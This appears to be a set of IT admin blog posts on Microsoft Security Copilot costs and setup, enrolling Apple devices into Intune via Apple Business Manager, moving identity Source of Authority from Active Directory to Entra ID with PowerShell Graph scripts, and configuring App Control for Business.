Specifically for Intune, Microsoft announced using mainly assistants instead of agents, because most Admins are not cool with an AI potentially changing settings in there whole environment without explicit approval. There is even a unified task screen in Intune since November 2025. This is specifically to help with any approvals that might come up. This is partly because of Assistants, but not exclusively. (You can learn more about Intune assistants here)

💰 What does it cost?

The cost of Security Copilot depends on the number of Security Compute Units (SCUs) you set up to run your workloads. You can use provisioned SCUs, which are charged by the hour or overage SCUs, which are charged consumption based. You basically pay for the amount you used each month, and if you use more, you pay extra units on top. But you need to provition 1 SCU minimum per month.

1 provisioned SCU costs 4$ per hour. 1 overage SCU costs 6$ per hour. (Dezember 2025)

EXAMPLE

You have 4 provisioned SCUs with an overage limit of 6 SCUs.

You run a prompt consuming 3 SCUs and use incident summarization in Defender, which consumes 0,5 SCU. You now used 3,5 total SCUs, so you’ll be charged 4 SCUs at 4$ per provisioned SCU, totaling $16 for that hour. (Provitioned SCUs are rounded up per clock hour, because the billing is always in hourly blocks. eg. from 3 pm to 4 pm)

You then run a promptbook that consumes another 3,2 SCUs during the same hour, for a total of 7,2 SCUs. That means you`ll now be charged for the provisioned 4 SCUs at 4$ and the 3,2 overage SCUs at 6$, making it 35,20$.

You can calculate the estimated costs for your needs using the SCU Calculator from Microsoft. If you want to learn more about which action consumes how many SCUs in your environment or overall, check out the Manage security compute unit usage in Security Copilot documentation.

INFO

Microsoft announced at Ignite 2025 that SCUs will be included for free in every Microsoft 365 E5 license. Microsoft 365 E5 customers get 400 SCUs every month for every 1,000 user licences they have, up to a maximum of 10,000 SCUs every month.

🖥️ What is an SCU?

An SCU (Security Compute Unit) is the amount of computing power you need to run Microsoft Security Copilot. You practically buy compute capacity for your prompts and tasks. The same principle as a prepaid mobile phone plan.

💿 How to provision Security Copilot

INFO

If you got Microsoft 365 E5 licenses and SCUs are included, then you can skip this whole thing completely and directly start using Security Copilot.

Prerequisites

An active Subscription
One of the following roles
- Global Administrator
- Billing Administrator
- Entra Compliance Administrator
- Intune Administrator
- Security Administrator
- Purview Compliance Administrator
- Purview Data Governance Administrator
- Purview Organization Management
Contributor or Owner of the Subscriptions

Provisioning

Sign in to the Microsoft Security Copilot Admin Center and start the first run experience. Here you will need to select a subscription, a resource group, a name and locations. Underneath that you can select the number of SCUs you want to provision or overage, accept terms and conditions and click Continue.

Next screen you can opt-in to help Microsoft improve Security Copilot or not and in the screen after that you get the info that Security Copilot is obviously accessing your data.

Second to last configuration screen, you need to allow purview to basically be able to keep an eye on the data that Security Copilot is using. Lastly you get a screen with the default owner roles and the possebility to change them.

With that done, the Copilot provisioning run a few seconds and you get a success confirmation.

💡 Conclusion

Security Copilot a great way to making your life as an admin easier. Not only as a security analyst, helping with triaging and investigating incidents, but also as an Intune or Entra admin, helping you write policies or queries. Now that SCUs are included in the E5 license, many companies get free access to it and can try for themselfs. The amount of agents for it and plugins will only grow steeply in the future and in my opinion is help in getting better information quicker especially important now that bad actors also use AI in there attacks.

AI is just another tool in your toolbelt of making your admin life easier and keeping your environment secure.

Microsoft provides the great Security Copilot Adoption Hub if you want to read more.

Apple Business Manager | Intune

Tue, 25 Nov 2025 21:35:53 GMT

Apple Business Manager

👋 Introduction

Apple Business Manager (ABM) is a web portal that helps organizations easily deploy and manage Apple devices, apps and accounts. It unifies device enrollment, app purchasing and managed account provisioning into a single, streamlined portal. You can also connect Apple Business Manager to your existing MDM to centralize management across your organization.

Key features

Automated Device Enrollment directly from the carrier or reseller
Central app and book purchasing
Federated managed Apple Accounts
Integration with MDM solutions

👨‍💼 Create Apple Business Account

Admins can sign up for Apple Business Manager and start using basic features in minutes without cost. You need to verify your organization to use the full feature set, like Automated Device Enrollment, App Store volume purchasing and managed Apple IDs.

TIP

Use a dedicated service account for the Apple Business Manager instead of a user email account. This email address becomes your administrator managed Apple Account. This ensures that your future access remains independent of specific employees.

Create the Account

Go to https://business.apple.com/ and select Sign up now, then Get Started.

Enter your information and select Continue.

Next, create and confirm a password for your new account, then enter your phone number.

IMPORTANT

A one-time verification code is sent to your email address first, then a different code is sent to your phone number.

Lastly follow the prompts to finish setting up your Apple Business Manager account.

Verify your company

After you created your Apple Business Account you should verify your company, so you can take full advantage of all the features of Apple Business Manager.

Without verifying your organization, you can’t access certain features of Apple Business Manager and Apple Business Essentials (An additional subscription service that provides a few additional features, but nothing important for device management. Learn more here):

Feature	without verification	with verification
Managed Apple Accounts	✅	✅
AppleCare support	✅	✅
Domain verification	✅	✅
Domain Capture	❌	✅
Connecting to an identity provider (IdP)	❌	✅
Federated authentication	❌	✅
Directory sync	✅	✅
Essentials app (This feature is available only with Apple Business Essentials)	✅	✅
User Enrolment	✅	✅
Device Enrollment	❌	✅
Automated Device Enrollment	❌	✅
Edit device management service assignments	❌	✅
Add device management service	❌	✅
Access beta features	❌	✅
iCloud sharing outside the organization	❌	✅
iMessage and FaceTime	❌	✅
Apps and Books Store	❌	✅
AppleCare repairs (This feature is available only with Apple Business Essentials)	❌	✅
2 TB iCloud storage (This feature is available only with Apple Business Essentials)	❌	✅
Device plans availability (This feature is available only with Apple Business Essentials)	❌	✅

INFO

Verification can take a few business days, depending on how busy Apple is and whether they can reach the contact you provided. If your organization isn’t approved in time, Apple will delete the organization and its data.

Go to https://business.apple.com/, sign in and open the settings page.
Go to the Organization Settings and select Verify, then enter your organization’s D-U-N-S (Data Universal Numbering System) Number (To learn more about locating or requesting a D-U-N-S Number click here).
Enter the contact information for someone Apple can call to verify your organization. This needs to be a person with authority to speak on behalf of your organization, such as your CEO, CTO or CFO.
Now wait and look for an email from Apple Business Manager with the subject “Your enrollment is in review”. During the review, Apple will contact your verification contact to confirm your information. Make sure emails from any apple.com address aren’t blocked, and call back quickly if you miss a call so the process can continue.

TIP

After your organisation is approved, create one additional user with the Administrator role as a backup, so you can recover access if your standard admin account gets lost. You can create users in the Users blade of the Apple Business Manager portal and assign roles via the Access Mangement blade, in the main menu.

🔗 Connect Apple Business Manager with Intune

Connecting an MDM to Apple Business Manager makes it easy to set up and manage Apple devices. New devices can configure themselves automatically with the right apps and settings, reducing the need for manual work. It also improves security and ensures your organization keeps control of its devices throughout their lifecycle.

Connect Apple Business Manager with Intune

Open the Microsoft Intune admin center, go to Devices -> Enrollment and open the Apple tab.
Now select Apple MDM Push Certificate and start the configuration.

First you need to give Microsoft permission to exchange data with Apple.
Next, click on Download your CSR to download the Intune certificate signing request (.csr) file.
Now go to the Apple Push Certificates Portal and sign in with the same Apple ID you used for the ABM.
Select Create a Certificate and accept the terms and conditions.

Upload the Intune certificate signing request (.csr) file you downloaded earlier and select Upload.

After the upload is complete, you get a confirmation that the certificate was created successfully. Then download the Apple MDM push certificate (.pem) file.

Now back in the Intune portal, enter the Apple ID you used to create the Apple MDM push certificate, upload the .pem file you just downloaded from Apple and click Upload.
After that the status of the Apple MDM Push Certificate should show as Active.

Configure automatic enrollment token

To now set up automatic enrollment for Apple devices, you need to create an enrollment profile in Intune and assign it to the devices in Apple Business Manager.

Open the Microsoft Intune admin center, go to Devices -> Enrollment and open the Apple tab.
Now select Enrollment program tokens under the Bulk Enrollment Methods and click Create.

As before you neew to give Microsoft permission to exchange data with Apple and then Download your public key (.pem) file.
Then open the ABM portal and go to the Settings page.
Under Device Management Services, select Add.

Give your new MDM a name, create it, open it and then click Download Token.

In the window that appears, you should check the box for the MDM to be able to release devices, then upload the public key (.pem) file you downloaded from Intune and click Save.

The token you just created should now download and you can upload it back in Intune and enter your AppleID again.
Click Next, add Scope Tags if needed and Review + create.
Lastly you should go back to the ABM Portal and configure your default MDM per device type. You can do that by opening the settings page and selecting your MDM for the different device types under Management Assignment.

Configure automatic enrollment profile

Now that you have created the enrollment token, and the Status in the Intune Portal is Active, you can create an enrollment profile by clicking on the token in the list.

Click on Profiles, then click Create profile and select if you want to create an iOS/iPadOS or macOS profile.

Now give your profile a name and description, then click Next.
In the Management Settings section, you can configure how your devices should enroll.

iOS/iPadOS Profile	macOS Profile

User affinity: You can enroll with user affinity or without user affinity. iOS/iPadOS devices can additionally enroll in shared Entra mode.
Authentication Method: You can choose between Setup Assistant (legacy) or Setup Assistant with modern authentication. iOS/iPadOS devices can additionally use the Company Portal.
Locked enrollment: Prevents the user from removing the management profile through system preferences or terminal.
Await final configuration: Pauses and locks Setup Assistant before the home screen so Intune can finish applying critical settings.

In the Setup Assistant section, you can enter the Department and Phone Number you want to show up for the end user. You can also choose which Setup Assistant screens to show or hide during device enrollment.

Example:

In the macOS profile you can also configure additional Account Settings, for a potential local admin and user account on the device.

Then click Next and Review + create.
In the Profile you can now, next to the automatically assigned devices, also manually assign devices that are already in Intune.

If you now go back to the Profiles list directly under the Enrollment token, you can also set default profiles for iOS/iPadOS and macOS.

Configure enrollment Type & Notifications & Restrictions

If you additionally want configure a default enrollment method for non automated enrollments you can create an enrollment type profile.

Open the Microsoft Intune admin center, go to Devices -> Enrollment and open the Enrollment type profile.
Here you can create a profile with the default enrollment method.

Or you can set restrictions to which devices can enroll in the first place.

Open the Microsoft Intune admin center, go to Devices -> Enrollment and open the Enrollment restrictions or Enrollment Type Restriction.
Here you can set per platform if it is allowed at all, if personally owned devices are allowed and which version they need to have.

If you want to set additional notification about enrollments you can also do that.

Open the Microsoft Intune admin center, go to Devices -> Enrollment and open the Enrollment notifications in the Apple tab.
Here you can configure push and email notifications.

📱 Adding managed Apple devices

Adding your devices to the Apple Business Manager makes sure the devices are bound to your company while also allowing you to automatically enroll them in your MDM solution during the setup process. For this Apple provides the Automated Device Enrollment (ADE), formerly known as Device Enrollment Program (DEP). Here your reseller or carrier can directly add the devices to your ABM account during the purchase process, so your devices are automatically enrolled in Intune when they are unboxed and powered on for the first time. Like this you can send the devices directly from the reseller to end users without having to manually do anymore configuration.

To start adding devices to your Apple Business Manager account, go to the ABM portal and open the Devices page.
Here you first need to add your Apple Customer Number to be able to add devices that you purchased or the Reseller Number so your reseller adds new devices on your behalf automatically.

As soon as you have added devices to your ABM Account, you can assign them to an MDM solution (if you didn't set a default one already), release them from your org for reselling or turn off an activation lock.

After assigning devices to Intune, they should show up in the Intune portal under Devices -> iOS/iPadOS or macOS.
If you added an enrollment profile in the previous step, they will also automatically get that profile assigned.

🍎 Managed Apple accounts

Using an Apple device you need an Apple ID. For personal devices, users usually create their own Apple ID, but for corporate devices this is not a good idea. If you allow this, you not only lose control over this part of your identitiy management and the security that this provides, but also create an unnecessary barrier for your users when they enroll their devices. You risk, your data getting out or saved to personal storage or mail accounts, creating potential data privacy compliance issues or simply who pays for needed apps and how this gets handelt by accounting. All unnecessary if you use Managed Apple IDs. This can easily be done by federating your Entra ID with Apple Business Manager. With this your users just use there already existing credentials for there Apple devices.

Open the ABM portal,go to the Settings page and select Managed Apple Accounts.
Here you find your automatically generated apple domain and you can start the federation process by clicking Get Started.

Next you select your Identity Provider of choice, in our case Microsoft Entra ID and select Sign in with Microsoft.

After signing in you need to consent to a view permission for the Apple Business Manager and then your Entra ID will be connected.

Now you see your newly federated domains in the list at the bottom of the page. Next to these you can click on Manage to turn on federation for the specific domains.

You click next to Sign in witch Microsoft Entra ID on Set up, the status will then change to Turning on Federation and shortly after it will be toggled on.

Now that your domains are federated, you need to add your user accounts to the ABM directory and for that you can enable the automatic account syncing, which will create your existing Entra users automatically in ABM as Managed Apple IDs. For this you click under Directory Sync on the 3 dots to the right and select Connect.

After the sync is done you can find the processed accounts info in your Activity blade.

And you find your users in the Users blade. Your users can start using their Entra accounts now as Apple IDs.

🛒 App Store volume purchasing

With the ABM you can also buy apps and books centrally in volume without the hassle of individual purchases or distributing credit card infos to your users. It’s called the Volume Purchase Program (VPP). It lets your organization retain ownership of purchased apps instead of tying them to individual accounts, making it easy to reassign licenses to other users.

To use the VPP with your MDM you must first connect it. For that you open the ABM portal, go to the settings page -> Payments and Billing. Here you can activate the Content Token and download the token file (.vpptoken). On this page you would also enter payment information for purchasing payed apps.

TIP

You don`t need to enter any payment information for free apps.

Now open the Microsoft Intune admin center, go to Tenant administration -> Connectors and tokens -> Apple VPP Tokens and click Create.
Enter a name for the token, the Apple ID you used to create the token and upload the .vpptoken file you downloaded from ABM and click Next.

On the next page you choose your Contry/Region and your Type of VPP account (Depending if you use the Apple Business Manager (Business) or Apple School Manager(Education)). In addition to that you can toggle if this token was used before by another MDM solution and Intune should take control (so you can continue using all the licenses seemlessly) and if you like, Automatic app updates. Then you also need to grant Microsoft the permission to exchange data with Apple, so it can send and receive data from ABM.

When you proceed to the next pages you can add scope tags and hit Review + create.

When you now go back to the ABM and select Locations you need to add a Location first, to assign apps.
If you select Apps and Book in the main menu then, you can find all your purchases there. To find and buy new apps you just enter the name in the search bar, select the location, the quantity and click Get.

After every buy the admin gets a mail with your purchase confirmation.

If you then go back to the Intune admin center the apps will automatically get synced to the Apps page with the Type iOS volume purchase program app (the platform at the start, changes with the type of app you purchased) and you can assign them to your devices or users.

⚙️ Device Management through Intune

Now that you got an Apple Account, connected it to Intune, got your managed apple id's, got your devices in and connected VPP, you can start the managing. Here now is no difference anymore between these devices and other corporate managed apple devices you might have added before via Company Portal or Apple Configurator.

➡️ Migrate Apple devices from other MDM's to Intune

When Apple released iOS/iPadOS/macOS 26 in August, they also added an MDM migration functionality as a new feature to ABM. That solved one of the main headaches people had with switching MDM solutions in the past. Usually, you had to do a factory reset on the devices before they could be manually re-enrolled. This new migration feature, which is directly built in to the ABM, lets IT admins move devices from one MDM to another without big end-user downtime.

Prerequisites

Administrator or Device Enrolment Manager permissions in Apple Business Manager
Intune Administrator or Global Administrator permissions in Microsoft Intune
Devices with iOS, iPadOS or macOS 26 or later
Devices need to be enrolled with Apple Business Manager

IMPORTANT

To keep things working smoothly and make it easy for users, it's important that admins make sure Intune uses the same settings as the old MDM and use the Await final configuration setting. This way users don`t need to worry about new settings or a different experience and it makes the migration much smoother. Amending the settings to your liking should then be done gradually in a scond step, to not give the end user too many chances to compain about this whole IT "noncense" 😉 and there constant changes.

MDM migration - Admin experience

Document the settings in your old MDM solution.
Add Intune as a MDM solution to ABM as explained above (Connect Apple Business Manager with Intune, Configure automatic enrollment token).

INFO

You can also configure your MDM per device type if you need to use more then one MDM solution in your environment.

Open the Intune admin center and set up the documented settings from your old solution in Intune and any additional configurations you need (enrollment profiles, compliance policies, configuration profiles, apps, etc.)

WARNING

Please test the migration process before rolling out to your production devices, to make sure your settings in Intune are actually the same as before and the user experience is not negatively impacted.

Then you can go back to ABM and switch the Device Management for your devices to Intune. For that open the Device you want to migrate, select the three dots on the top right and click Assign Device Management.

Now select the new MDM, click Continue, set a migration deadline for the user, click Continue again and then Confirm the change.

VPP

If volume purchased apps were part of the old MDM deployment, you should not set a migration deadline greater than 30 days so to not run into problems with automatic license queries from app developers.

Notifications

After you set the migration deadline, users receive ongoing re‑enrolment alerts:

daily until 24 hours before the deadline
hourly, until the final hour
during the final hour in 60, 30, 10 and 1 minute intervals.

MDM migration - User experience

TIP

I higly recommend informing your users beforehand about the upcoming notification and clicks they have to do. Even so it is a pretty straight forward process for the user, taking the time beforehand to inform and, depending on your endusers IT affinity, maybe issuing a short one page guide, will save you a lot of helpdesk calls in the end.

First the enduser gets a push notification on his device that he needs to re-enroll the device.
When the user clicks the notification and then Start Enrollment on mac or Start Enrollmentdirectly on iOS the rest of the process is completly automatic.

macOS	iOS/iPadOS

At the end the user will get a notification that the enrollment is complete and thats it for him.

The admin can now go back to the Intune portal and the device shows under devices, with no difference to any other device that Intune manages.

MDM migration - Volume purchased apps

You first need to open your old MDM and remove the VPP token there. If you get the option to remove the apps from the devices you should decline that.
Next you can download the same token from ABM again and add it to Intune, as shown above in the App Store volume purchasing section.

IMPORTANT

To make the old token work, you need to toggle the option "Take control of token from another MDM" while adding the token to Intune.

💡 Conclusion

Apple Business Manager (ABM) combined with Intune gives you a powerful, modern foundation for managing Apple devices at scale. ABM centralizes device enrollment, app purchases, and managed Apple IDs, while Intune brings policy, app distribution, and lifecycle management together in a single pane. Together they reduce manual steps, improve security, and make device provisioning far more predictable for admins and users alike.

Why use the ABM?

Automated Device Enrollment: Devices from resellers or carriers are assigned and enrolled automatically, cutting setup time for IT and end users.
Managed Apple IDs: Federating with Entra ID lets users sign in with familiar credentials and keeps organizations control intact.
Centralized App Licensing: VPP simplifies app distribution and license reassignment.

Why Intune?

Microsoft works directly with Apple to support the latest features mostly on the same day they release.
Microsoft also works constatly to bring more and more new features to Apple devices (LAPS for example).
Without knowing every single Apple MDM out there, Intune should be on-par or better then most of them by now.
If you are using M365 already, you got the nessecary linceses without extra costs and save on the overhead of managing multiple MDM solutions.
If you are using Intune or Defender already, you get a single pane of glass for all your devices and security.

So taking a look does not hurt, even if you are happy with your current MDM solution or not using Intune yet. Keeping your eyes open can sometimes reveal new synergies and save money in the future.

Cloud Identity Migration with SOA | Entra ID

Mon, 13 Oct 2025 19:41:58 GMT

Cloud-first approach to identity management:
Transferring Source of Authority from Active Directory to Entra ID Transferring Source of Authority from Active Directory to Entra ID"">

👋 Introduction

The Source of Authority (SOA) in identity management is the single source of truth for an identity's existence and core attributes, like name, email address and job title.

On the journey to a cloud environment, organizations sooner or later need to switch their SOA to the cloud. This means that instead of managing users and groups in an on-premises Active Directory (AD), the management is done directly in Microsoft Entra ID. To ilustrate this concept further, Microsoft provides a nice diagram how an environment can evolve from on-premises to 100% cloud.

This modernization is a crucial step in the cloud journey, it not only improves security, reduces on-prem costs but also makes the management substantially easier through automation and centralized control.

In this article, I will explain why a cloud identity management could be the right fit for your organization and the process of transferring the Source of Authority from AD to Entra. In moving the SOA, administrators enable a phased migration approach, allowing for a smoother transition to the cloud while minimizing disruption to users and services.

☁️ Is cloud identity management right for you?

Improvements

Active Directory has long been a prime target for attackers because it controls so much access. Moving your identities and application authentication to Entra ID reduces that risk. Entra ID adds protection through features like Conditional Access and Lifecycle Workflows. It also enables modern options such as passwordless sign-in and better identity governance, even for apps that were once on-prem. Overall, managing identities through Entra ID strengthens security across the organization.

IT admins can manage identities, groups and app access from the Entra admin center or via PowerShell.
Entra governance (Entitlement Management, Access Reviews, Lifecycle Workflows) automates user and group lifecycles and aids accountability with strong audit trails.
Users get single sign-on to both cloud and on-prem apps with modern features like Conditional Access and passwordless login. This means fewer passwords to manage and stronger protection for their credentials.

Road to the Cloud

Like mentioned in the introduction, most organizations move to the cloud in phases. They usually start with a hybrid setup, using both on-premises AD and cloud services. The next step is a cloud-first stage, where more resources shift to the cloud. Over time, they work toward an AD-minimized state.

SOA transfer helps with that journey by letting you move users, groups and contacts to Entra much easier with the additional option to roll back changes if needed. This avoids major changes all at once in a big bang kind of way. Instead, you can migrate identities in phases and slowly reduce their AD footprint. But, always start with checking your applications before transferring SOA, to ensure users don’t lose access to apps relying on AD authentication.

As you start moving your apps and identities to the cloud, many users and groups will no longer be needed in Active Directory and can be removed or retired.

You can also move user creation and lifecycle management to the cloud. Using Entra ID Governance, you can manage SOA-transferred users and groups directly in the cloud and set up automation for creating new identities.

Are you ready for SOA?

By following this flowchart you can determine if you are ready to transfer the source of authority for your users and groups:

Moving users: SOA works for users who don’t rely on AD DS for app access. To plan the migration, you need to know which user is tied to which app.

Moving groups: For groups, start by moving security groups to the cloud. If needed, you can provision them back to AD from Entra. For Distribution Lists and Mail-Enabled Security Groups, move them when you migrated to Exchange online.

💿 Application-centric migration approach

The application-centric approach is one of the recommended ways to tackle cloud migration. Like this you will try to modernize your app authentication without compromising access for users.

The following steps outline an example of the process transferring your identities with SOA from AD to Entra:

Discover Active Directory–Integrated applications
Map applications to AD Security Groups
Clean up unused AD groups
Identify users for each application
Determine authentication methods
Assess modernization feasibility

Older applications with hard-coded assumptions about AD are out of scope for this kind of migration.

Categorize applications and plan integration approach

Apps that get retired or replaced
Apps on modern auth can be moved directly to Entra (update AD FS to Entra, migrate to Azure Files)
Kerberos/NTLM apps can be published with Entra Application Proxy or Entra Private Access and use Kerberos Delegation so Entra handles auth and AD gets Kerberos tickets
LDAP-bound apps can use Microsoft Entra Domain Services (managed AD in Azure) so apps can bind to a cloud LDAP endpoint
Legacy apps that can't be modernized could be hosted on Azure Virtual Desktop
Apps without connections to the environment (High Security)

Mapping and planning
Migrate groups to the cloud
Handling LDAP-based applications (Directory-Bound Apps)
Handling Kerberos-based applications (Windows Integrated Auth)

User lifecycle: After moving a user to cloud management, keep an AD account with the same UserPrincipalName for Kerberos
Auth & attributes: Don’t migrate users who need password-based AD apps that can’t be changed to Kerberos. Apps that use Kerberos and read AD attributes require those attributes kept in sync (dual-write or similar).
Devices & SSO: For seamless Kerberos SSO, devices should be Microsoft Entra–joined or hybrid-joined. Domain‑only devices with cloud-managed users often need manual logon.

Verify and optimize

TIP

Always start with an app-centric analysis to avoid breaking access for users tied to AD apps. Use phased migration to avoid a “big bang” cutover and long downtimes.

👥 Transferring group SOA from AD to Entra

WARNING

Please be aware that this Feature is in Preview at the moment.

To transfer the source of authority for a group from AD to Entra, make sure that the group is synchronized to Entra.

When you got the groups synchronized, you can use PowerShell to change the SOA.

TIP

You can get a list of all your groups that are currently synchronized from on-prem by running the following command:

powershell

get-mgbetagroup -all -property * | Where-Object { $_.OnPremisesSyncEnabled -eq $true } | select Displayname, OnPremisesSyncEnabled

Use the following PowerShell script to change the SOA of a group from AD to Entra.

powershell

Import-Module Microsoft.Graph.Beta.Groups
Import-Module Microsoft.Graph.Authentication

# Define the Parameters
$tenantId = "[YourTenantID]"
$groupName = "[MyGroupName]"

#Connect to Microsoft Graph using delegated permissions
Connect-MgGraph -Scopes "Group.Read.All, Group-OnPremisesSyncBehavior.ReadWrite.All" -TenantId $tenantId


# Retrieve the group using group name
$group = Get-MgBetaGroup -Filter "displayName eq '$groupName'"

# Ensure group is found
if ($null -ne $group)
{
    $groupObjectID = $($group.Id)
    # Define the Microsoft Graph API endpoint for the group
    $url = "https://graph.microsoft.com/beta/groups/$groupObjectID/onPremisesSyncBehavior"

# Define the JSON payload for the PATCH request
    $jsonPayload = @{
        isCloudManaged = "true"
    } | ConvertTo-Json

# Make the PATCH request to update the JSON payload
    Invoke-MgGraphRequest -Uri $url -Method Patch -ContentType "application/json" -Body $jsonPayload

$result = Invoke-MgGraphRequest -Method Get -Uri "https://graph.microsoft.com/beta/groups/$groupObjectID/onPremisesSyncBehavior?`$select=id,isCloudManaged"

Write-Host "Group Name: $($group.DisplayName)"
    Write-Host "Group ID: $($result.id)"
    Write-Host "SOA Converted: $($result.isCloudManaged)"
}
else 
{
    Write-Warning "Group '$groupName' not found."
}

TIP

If you want to change the SOA for multiple groups, can just edit this line $group = Get-MgBetaGroup -Filter "displayName eq '$groupName'" to change the filter and the $group to $groups and then put a foreach($group in $groups) loop around the code directly beneath that.

Now you will see that the source field in the groups changed from Windows Server AD to Cloud.

INFO

You can also check the audit logs to confirm the change.

👤 Transferring user SOA from AD to Entra

WARNING

Please be aware that this Feature is in Preview at the moment.

To transfer the source of authority for a user from AD to Entra, make sure that the user is synchronized to Entra.

When you got the users synchronized, you can use PowerShell to change the SOA.

TIP

You can get a list of all your users that are currently synchronized from on-prem by running the following command:

powershell

get-mgbetauser -all -property * | Where-Object { $_.OnPremisesSyncEnabled -eq $true } | select Displayname, OnPremisesSyncEnabled

Use the following PowerShell script to change the SOA of a user from AD to Entra.

powershell

Import-Module Microsoft.Graph.Beta.Users
Import-Module Microsoft.Graph.Authentication

# Define the Parameters
$tenantId = "[YourTenantID]"
$userName = "[MyUserName]"

#Connect to Microsoft Graph using delegated permissions
Connect-MgGraph -Scopes "User.Read.All, User-OnPremisesSyncBehavior.ReadWrite.All" -TenantId $tenantId


# Retrieve the user using user name
$user = Get-MgBetaUser -Filter "displayName eq '$userName'"

# Ensure user is found
if ($null -ne $user)
{
    $userObjectID = $($user.Id)
    # Define the Microsoft Graph API endpoint for the user
    $url = "https://graph.microsoft.com/beta/users/$userObjectID/onPremisesSyncBehavior"

    # Define the JSON payload for the PATCH request
    $jsonPayload = @{
        isCloudManaged = "true"
    } | ConvertTo-Json

    # Make the PATCH request to update the JSON payload
    Invoke-MgGraphRequest -Uri $url -Method Patch -ContentType "application/json" -Body $jsonPayload

    $result = Invoke-MgGraphRequest -Method Get -Uri "https://graph.microsoft.com/beta/users/$userObjectID/onPremisesSyncBehavior?`$select=id,isCloudManaged"

    Write-Host "User Name: $($user.DisplayName)"
    Write-Host "User ID: $($result.id)"
    Write-Host "SOA Converted: $($result.isCloudManaged)"
}
else 
{
    Write-Warning "User '$userName' not found."
}

TIP

If you want to change the SOA for multiple users, can just edit this line $user = Get-MgBetaUser -Filter "displayName eq '$userName'" to change the filter and the $user to $users and then put a foreach($user in $users) loop around the code directly beneath that.

Now you will see that the source field in the users changed from Windows Server AD to Cloud.

INFO

You can also check the audit logs to confirm the change.

💡 Conclusion

Moving the source of authority from Active Directory to Entra ID is a practical way to make cloud migrations easier, modernize identity, improve security and reduce on-premises reliance. This shift simplifies admin tasks and sets the stage for features like self-service, conditional access and automated lifecycle management.

The safest path is pragmatic and phased: start by inventorying apps and dependencies, then pilot a small set of users or groups. Validate authentication, SSO and use the right integration method per app. As you scale, monitor closely and leverage Entra governance to automate routine processes.

Start small and try to iterate. This approach lowers migration risk, minimizes headaches, delivers better manageability and positions your organization for a more flexible and secure future.

WARNING

But be aware that it needs a cultural shift within the organization to fully embrace these changes. Not only in departments like HR, with the automation of onboarding and offboarding processes, but also in IT, where admins need to get used to new tools, workflows and letting go of old habits. With these automations and workflows and the accountability in form of strong audit trails and security it brings, you got more options to delegating responsibilities (with admin units, entitlement management, workflow automation, access reviews etc.), empowering teams and reducing your workload.

But this shouldn't keep you from starting this journey. Nobody starts at 100% and using all the tools and all the possibilities at once. Start small, try things out, learn and iterate.

SOA battle card infos for IT admins

These are some key points you can use to explain yourself about the benefits of transferring your identity management to the cloud.

Understanding strategic benefits

Reduces security risks and costs, while elevating flexibility by minimizing on-premises dependencies.
Enables modern security features (Conditional Access, passwordless, Zero Trust).
Possibilities to streamline identity management and governance with automation.

Monitoring & accountability

Strong audit trails for compliance and audits.
Possibilities for delegation and clear separation of duties.
Tools to get workflows and decisions back to the people where they belong, without the IT as middle man and without compromising security, compliance or administrative control.
Enables self-service for users and managers, reducing IT workloads.

Resources

App Control for Business | Intune

Wed, 01 Oct 2025 23:10:39 GMT

App Control for Business

👋 Introduction

App Control for Business is a security feature in Microsoft Intune that helps organizations control which apps can run on Windows devices. It ensures only approved applications are allowed while blocking anything that doesn’t meet your company’s rules. These policies are part of Intune’s endpoint security and use the Windows ApplicationControl CSP to enforce restrictions.

Intune’s managed installer policy also tags apps (not retroactively) you deploy through Intune as trusted, so software deployed through your MDM does not need to be approved, saving time when you also use Intune for your app deployment. Here Microsoft made huge steps in simplifying approving apps, with their latest update, which lets you create multiple Managed Installer rules and assign them to different groups. This seems to suggest that it is only a matter of time until other managed installers are able to be used similarly.

Why use it?

App Control for Business prevents risky or unnecessary software from running.

Reduce risks: block untrusted apps, tampered with apps or simply unwanted apps.
White-/Blacklisting: only approved apps are allowed.
Shadow IT: prevent unauthorized third party apps from being installed.
Licensing: help your compliance team keep unlicensed software installations in check.

App Control for Business vs. AppLocker

You may have recognized that it sounds an awful lot like AppLocker. Here is the difference:

Feature / Capability	App Control for Business	AppLocker
Control which apps can run	✅	✅
Integrates with Intune	✅	❌
For cloud-managed environments	✅	❌
Automatic trust for Intune-deployed apps	✅	❌
Uses Windows ApplicationControl CSP	✅	❌
Rule types (path, publisher, hash)	✅	✅
Strong enforcement / blocks bypass attempts	✅	⚠️
Easy to manage at scale	✅	⚠️
Managed via Group Policy	❌	✅
Getting new features	✅	❌
Windows 7 and earlier	❌	✅
User based policies (for shared devices)	❌	✅

✅ = Fully supported
⚠️ = With limitations
❌ = Not supported

In short, if you can use App Control for Business, you should.
But there are a few scenarios where AppLocker might still be needed.

💾 Managed installer

A managed installer marks apps and all the files it installs as trusted. As soon as a policy is created, all deployed apps will get tagged as coming from a managed installer. App Control can be set to allow these apps to run, unless a specific deny rule blocks them.

DANGER

When you enable this feature, any app deployed via Intune is automatically trusted. If an Intune-distributed app becomes compromised, App Control will not block it.

Open the Microsoft Intune admin center -> App Control for Business and click on the Managed Installer tab.

With + Create you can now create a managed installer policy, adding Intune as a trusted Installer.

INFO

You can find known limitations to the managed installer feature here.

🔏 App Control policy

With Intune’s App Control for Business policies, you control which apps can run on your managed Windows devices. By default, apps not approved by the policy are blocked. If you enable Audit mode, all apps are allowed to run, but their activity is logged locally for review.

There are two types of policies: base policies and supplemental policies. A base policy is the starting point that defines the core rules for which apps can run on your managed Windows devices. Once you’ve set up a base policy, using either XML data or the built-in controls, you can expand it with supplemental policies. Supplemental policies let you add more rules in XML format to build on the original base policy. You can also apply multiple supplemental policies to the same base policy, giving you flexibility and fine-grained control over your app management.

Microsoft also is hard at work expanding the controls in Intune and making it easier to create policies in the future without the need for XML knowledge.

IMPORTANT

You should always start with auditing your policy, so to not block all your apps.

Open the Microsoft Intune admin center -> App Control for Business and click on + Create Policy.

Now add the policy name and description.
In the Configuration settings tab, you have two possibilities for the Configuration settings format.
- Use built-in controls
- Enter xml data

The built-in controls provide Microsoft template options, allowing you to trust Windows components and Store apps. You can also choose to trust files with good reputation and trust apps from managed installers. Additionally, select whether to apply an Audit policy (logs activity without blocking apps) or to enforce the rules (blocks unapproved apps).

INFO

To generate XML data for custom app control policies, use the official Microsoft tool WDAC Wizard.
See the step-by-step instructions in the WDAC Wizard section below.

Next up you can insert your tags and add your assignments
Then click Create and you're done

If you use the built-in controls as base policy, in the following table you will find the standard policy IDs for reference in your supplemental policies. These IDs do not change.

Base policy ID	Explanation
{A8012CFC-D8AE-493C-B2EA-510F035F1250}	Enable app control policy to trust Windows components and Store apps.
